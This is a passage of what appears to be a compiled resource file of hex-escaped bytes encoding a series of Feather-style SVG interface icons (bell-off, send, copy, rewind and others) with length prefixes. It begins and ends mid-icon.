\x31\x2d\x33\x2e\x34\x36\x20\x30\x22\x3e\x3c\x2f\x70\x61\x74\x68\
\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\x31\x38\x2e\x36\x33\
\x20\x31\x33\x41\x31\x37\x2e\x38\x39\x20\x31\x37\x2e\x38\x39\x20\
\x30\x20\x30\x20\x31\x20\x31\x38\x20\x38\x22\x3e\x3c\x2f\x70\x61\
\x74\x68\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\x36\x2e\x32\
\x36\x20\x36\x2e\x32\x36\x41\x35\x2e\x38\x36\x20\x35\x2e\x38\x36\
\x20\x30\x20\x30\x20\x30\x20\x36\x20\x38\x63\x30\x20\x37\x2d\x33\
\x20\x39\x2d\x33\x20\x39\x68\x31\x34\x22\x3e\x3c\x2f\x70\x61\x74\
\x68\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\x31\x38\x20\x38\
\x61\x36\x20\x36\x20\x30\x20\x30\x20\x30\x2d\x39\x2e\x33\x33\x2d\
\x35\x22\x3e\x3c\x2f\x70\x61\x74\x68\x3e\x3c\x6c\x69\x6e\x65\x20\
\x78\x31\x3d\x22\x31\x22\x20\x79\x31\x3d\x22\x31\x22\x20\x78\x32\
\x3d\x22\x32\x33\x22\x20\x79\x32\x3d\x22\x32\x33\x22\x3e\x3c\x2f\
\x6c\x69\x6e\x65\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x66\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x68\x65\x78\x61\x67\
\x6f\x6e\x22\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\x32\x31\
\x20\x31\x36\x56\x38\x61\x32\x20\x32\x20\x30\x20\x30\x20\x30\x2d\
\x31\x2d\x31\x2e\x37\x33\x6c\x2d\x37\x2d\x34\x61\x32\x20\x32\x20\
\x30\x20\x30\x20\x30\x2d\x32\x20\x30\x6c\x2d\x37\x20\x34\x41\x32\
\x20\x32\x20\x30\x20\x30\x20\x30\x20\x33\x20\x38\x76\x38\x61\x32\
\x20\x32\x20\x30\x20\x30\x20\x30\x20\x31\x20\x31\x2e\x37\x33\x6c\
\x37\x20\x34\x61\x32\x20\x32\x20\x30\x20\x30\x20\x30\x20\x32\x20\
\x30\x6c\x37\x2d\x34\x41\x32\x20\x32\x20\x30\x20\x30\x20\x30\x20\
\x32\x31\x20\x31\x36\x7a\x22\x3e\x3c\x2f\x70\x61\x74\x68\x3e\x3c\
\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x67\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x76\x6f\x6c\x75\x6d\
\x65\x2d\x32\x22\x3e\x3c\x70\x6f\x6c\x79\x67\x6f\x6e\x20\x70\x6f\
\x69\x6e\x74\x73\x3d\x22\x31\x31\x20\x35\x20\x36\x20\x39\x20\x32\
\x20\x39\x20\x32\x20\x31\x35\x20\x36\x20\x31\x35\x20\x31\x31\x20\
\x31\x39\x20\x31\x31\x20\x35\x22\x3e\x3c\x2f\x70\x6f\x6c\x79\x67\
\x6f\x6e\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\x31\x39\x2e\
\x30\x37\x20\x34\x2e\x39\x33\x61\x31\x30\x20\x31\x30\x20\x30\x20\
\x30\x20\x31\x20\x30\x20\x31\x34\x2e\x31\x34\x4d\x31\x35\x2e\x35\
\x34\x20\x38\x2e\x34\x36\x61\x35\x20\x35\x20\x30\x20\x30\x20\x31\
\x20\x30\x20\x37\x2e\x30\x37\x22\x3e\x3c\x2f\x70\x61\x74\x68\x3e\
\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x3b\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x61\x72\x72\x6f\x77\
\x2d\x64\x6f\x77\x6e\x2d\x6c\x65\x66\x74\x22\x3e\x3c\x6c\x69\x6e\
\x65\x20\x78\x31\x3d\x22\x31\x37\x22\x20\x79\x31\x3d\x22\x37\x22\
\x20\x78\x32\x3d\x22\x37\x22\x20\x79\x32\x3d\x22\x31\x37\x22\x3e\
\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x70\x6f\x6c\x79\x6c\x69\x6e\x65\
\x20\x70\x6f\x69\x6e\x74\x73\x3d\x22\x31\x37\x20\x31\x37\x20\x37\
\x20\x31\x37\x20\x37\x20\x37\x22\x3e\x3c\x2f\x70\x6f\x6c\x79\x6c\
\x69\x6e\x65\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x45\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x74\x6f\x67\x67\x6c\
\x65\x2d\x72\x69\x67\x68\x74\x22\x3e\x3c\x72\x65\x63\x74\x20\x78\
\x3d\x22\x31\x22\x20\x79\x3d\x22\x35\x22\x20\x77\x69\x64\x74\x68\
\x3d\x22\x32\x32\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x31\x34\
\x22\x20\x72\x78\x3d\x22\x37\x22\x20\x72\x79\x3d\x22\x37\x22\x3e\
\x3c\x2f\x72\x65\x63\x74\x3e\x3c\x63\x69\x72\x63\x6c\x65\x20\x63\
\x78\x3d\x22\x31\x36\x22\x20\x63\x79\x3d\x22\x31\x32\x22\x20\x72\
\x3d\x22\x33\x22\x3e\x3c\x2f\x63\x69\x72\x63\x6c\x65\x3e\x3c\x2f\
\x73\x76\x67\x3e\
\x00\x00\x01\x42\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x61\x74\x2d\x73\x69\
\x67\x6e\x22\x3e\x3c\x63\x69\x72\x63\x6c\x65\x20\x63\x78\x3d\x22\
\x31\x32\x22\x20\x63\x79\x3d\x22\x31\x32\x22\x20\x72\x3d\x22\x34\
\x22\x3e\x3c\x2f\x63\x69\x72\x63\x6c\x65\x3e\x3c\x70\x61\x74\x68\
\x20\x64\x3d\x22\x4d\x31\x36\x20\x38\x76\x35\x61\x33\x20\x33\x20\
\x30\x20\x30\x20\x30\x20\x36\x20\x30\x76\x2d\x31\x61\x31\x30\x20\
\x31\x30\x20\x30\x20\x31\x20\x30\x2d\x33\x2e\x39\x32\x20\x37\x2e\
\x39\x34\x22\x3e\x3c\x2f\x70\x61\x74\x68\x3e\x3c\x2f\x73\x76\x67\
\x3e\
\x00\x00\x01\x50\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x74\x61\x72\x67\x65\
\x74\x22\x3e\x3c\x63\x69\x72\x63\x6c\x65\x20\x63\x78\x3d\x22\x31\
\x32\x22\x20\x63\x79\x3d\x22\x31\x32\x22\x20\x72\x3d\x22\x31\x30\
\x22\x3e\x3c\x2f\x63\x69\x72\x63\x6c\x65\x3e\x3c\x63\x69\x72\x63\
\x6c\x65\x20\x63\x78\x3d\x22\x31\x32\x22\x20\x63\x79\x3d\x22\x31\
\x32\x22\x20\x72\x3d\x22\x36\x22\x3e\x3c\x2f\x63\x69\x72\x63\x6c\
\x65\x3e\x3c\x63\x69\x72\x63\x6c\x65\x20\x63\x78\x3d\x22\x31\x32\
\x22\x20\x63\x79\x3d\x22\x31\x32\x22\x20\x72\x3d\x22\x32\x22\x3e\
\x3c\x2f\x63\x69\x72\x63\x6c\x65\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x3a\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x73\x65\x6e\x64\x22\
\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x32\x32\x22\x20\x79\
\x31\x3d\x22\x32\x22\x20\x78\x32\x3d\x22\x31\x31\x22\x20\x79\x32\
\x3d\x22\x31\x33\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x70\x6f\
\x6c\x79\x67\x6f\x6e\x20\x70\x6f\x69\x6e\x74\x73\x3d\x22\x32\x32\
\x20\x32\x20\x31\x35\x20\x32\x32\x20\x31\x31\x20\x31\x33\x20\x32\
\x20\x39\x20\x32\x32\x20\x32\x22\x3e\x3c\x2f\x70\x6f\x6c\x79\x67\
\x6f\x6e\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x02\x29\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x66\x69\x67\x6d\x61\
\x22\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\x35\x20\x35\x2e\
\x35\x41\x33\x2e\x35\x20\x33\x2e\x35\x20\x30\x20\x30\x20\x31\x20\
\x38\x2e\x35\x20\x32\x48\x31\x32\x76\x37\x48\x38\x2e\x35\x41\x33\
\x2e\x35\x20\x33\x2e\x35\x20\x30\x20\x30\x20\x31\x20\x35\x20\x35\
\x2e\x35\x7a\x22\x3e\x3c\x2f\x70\x61\x74\x68\x3e\x3c\x70\x61\x74\
\x68\x20\x64\x3d\x22\x4d\x31\x32\x20\x32\x68\x33\x2e\x35\x61\x33\
\x2e\x35\x20\x33\x2e\x35\x20\x30\x20\x31\x20\x31\x20\x30\x20\x37\
\x48\x31\x32\x56\x32\x7a\x22\x3e\x3c\x2f\x70\x61\x74\x68\x3e\x3c\
\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\x31\x32\x20\x31\x32\x2e\x35\
\x61\x33\x2e\x35\x20\x33\x2e\x35\x20\x30\x20\x31\x20\x31\x20\x37\
\x20\x30\x20\x33\x2e\x35\x20\x33\x2e\x35\x20\x30\x20\x31\x20\x31\
\x2d\x37\x20\x30\x7a\x22\x3e\x3c\x2f\x70\x61\x74\x68\x3e\x3c\x70\
\x61\x74\x68\x20\x64\x3d\x22\x4d\x35\x20\x31\x39\x2e\x35\x41\x33\
\x2e\x35\x20\x33\x2e\x35\x20\x30\x20\x30\x20\x31\x20\x38\x2e\x35\
\x20\x31\x36\x48\x31\x32\x76\x33\x2e\x35\x61\x33\x2e\x35\x20\x33\
\x2e\x35\x20\x30\x20\x31\x20\x31\x2d\x37\x20\x30\x7a\x22\x3e\x3c\
\x2f\x70\x61\x74\x68\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\
\x35\x20\x31\x32\x2e\x35\x41\x33\x2e\x35\x20\x33\x2e\x35\x20\x30\
\x20\x30\x20\x31\x20\x38\x2e\x35\x20\x39\x48\x31\x32\x76\x37\x48\
\x38\x2e\x35\x41\x33\x2e\x35\x20\x33\x2e\x35\x20\x30\x20\x30\x20\
\x31\x20\x35\x20\x31\x32\x2e\x35\x7a\x22\x3e\x3c\x2f\x70\x61\x74\
\x68\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x0c\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x63\x68\x65\x76\x72\
\x6f\x6e\x2d\x75\x70\x22\x3e\x3c\x70\x6f\x6c\x79\x6c\x69\x6e\x65\
\x20\x70\x6f\x69\x6e\x74\x73\x3d\x22\x31\x38\x20\x31\x35\x20\x31\
\x32\x20\x39\x20\x36\x20\x31\x35\x22\x3e\x3c\x2f\x70\x6f\x6c\x79\
\x6c\x69\x6e\x65\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x5f\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x63\x6f\x70\x79\x22\
\x3e\x3c\x72\x65\x63\x74\x20\x78\x3d\x22\x39\x22\x20\x79\x3d\x22\
\x39\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x31\x33\x22\x20\x68\x65\
\x69\x67\x68\x74\x3d\x22\x31\x33\x22\x20\x72\x78\x3d\x22\x32\x22\
\x20\x72\x79\x3d\x22\x32\x22\x3e\x3c\x2f\x72\x65\x63\x74\x3e\x3c\
\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\x35\x20\x31\x35\x48\x34\x61\
\x32\x20\x32\x20\x30\x20\x30\x20\x31\x2d\x32\x2d\x32\x56\x34\x61\
\x32\x20\x32\x20\x30\x20\x30\x20\x31\x20\x32\x2d\x32\x68\x39\x61\
\x32\x20\x32\x20\x30\x20\x30\x20\x31\x20\x32\x20\x32\x76\x31\x22\
\x3e\x3c\x2f\x70\x61\x74\x68\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x3f\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x72\x65\x77\x69\x6e\
\x64\x22\x3e\x3c\x70\x6f\x6c\x79\x67\x6f\x6e\x20\x70\x6f\x69\x6e\
\x74\x73\x3d\x22\x31\x31\x20\x31\x39\x20\x32\x20\x31\x32\x20\x31\
\x31\x20\x35\x20\x31\x31\x20\x31\x39\x22\x3e\x3c\x2f\x70\x6f\x6c\
\x79\x67\x6f\x6e\x3e\x3c\x70\x6f\x6c\x79\x67\x6f\x6e\x20\x70\x6f\
\x69\x6e\x74\x73\x3d\x22\x32\x32\x20\x31\x39\x20\x31\x33\x20\x31\
\x32\x20\x32\x32\x20\x35\x20\x32\x32\x20\x31\x39\x22\x3e\x3c\x2f\
\x70\x6f\x6c\x79\x67\x6f\x6e\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x8e\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x61\x6c\x69\x67\x6e\
\x2d\x63\x65\x6e\x74\x65\x72\x22\x3e\x3c\x6c\x69\x6e\x65\x20\x78\
\x31\x3d\x22\x31\x38\x22\x20\x79\x31\x3d\x22\x31\x30\x22\x20\x78\
\x32\x3d\x22\x36\x22\x20\x79\x32\x3d\x22\x31\x30\x22\x3e\x3c\x2f\
\x6c\x69\x6e\x65\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x32\
\x31\x22\x20\x79\x31\x3d\x22\x36\x22\x20\x78\x32\x3d\x22\x33\x22\
\x20\x79\x32\x3d\x22\x36\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\
\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x32\x31\x22\x20\x79\x31\x3d\
